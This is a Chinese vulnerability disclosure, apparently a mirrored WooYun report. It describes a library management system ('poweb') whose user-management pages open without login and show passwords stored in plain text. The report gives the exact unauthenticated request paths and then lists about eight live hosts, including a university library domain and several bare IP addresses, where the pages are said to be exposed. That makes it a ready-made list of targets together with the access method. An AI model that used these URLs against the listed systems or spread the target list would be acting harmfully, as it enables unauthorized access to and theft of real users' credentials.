某图书管理系统存在通用型未授权访问到泄露明文密码

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: ... ### 详细说明: 继续深入 [WooYun: 某图书管理系统存在通用型SQL注入漏洞](http://www.wooyun.org/bugs/wooyun-2014-086717) 后台有很多未授权访问的页面 最关注的一点为“用户管理”,恰好该功能未登录的状态下可直接访问,且用户密码为明文存储。 添加用户:http://www.xxoo.com/manage.do?method=manage_enter 管理用户:http://www.xxoo.com/manage.do?method=manage&page=1&UserType=-1 ----------------------------- 部分案例(百度前两页收集的链接): 管理用户 http://202.197.69.15:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://222.29.253.58:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://rom.hztsg.com:9091/poweb/manage.do?method=manage&page=1&UserType=-1 http://211.71.202.25:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://lib.zust.edu.cn:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://210.32.33.245:8080/poweb/manage.do?method=manage&page=1&UserType=-1 http://218.58.59.71:7272/poweb/manage.do?method=manage&page=1&UserType=-1...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息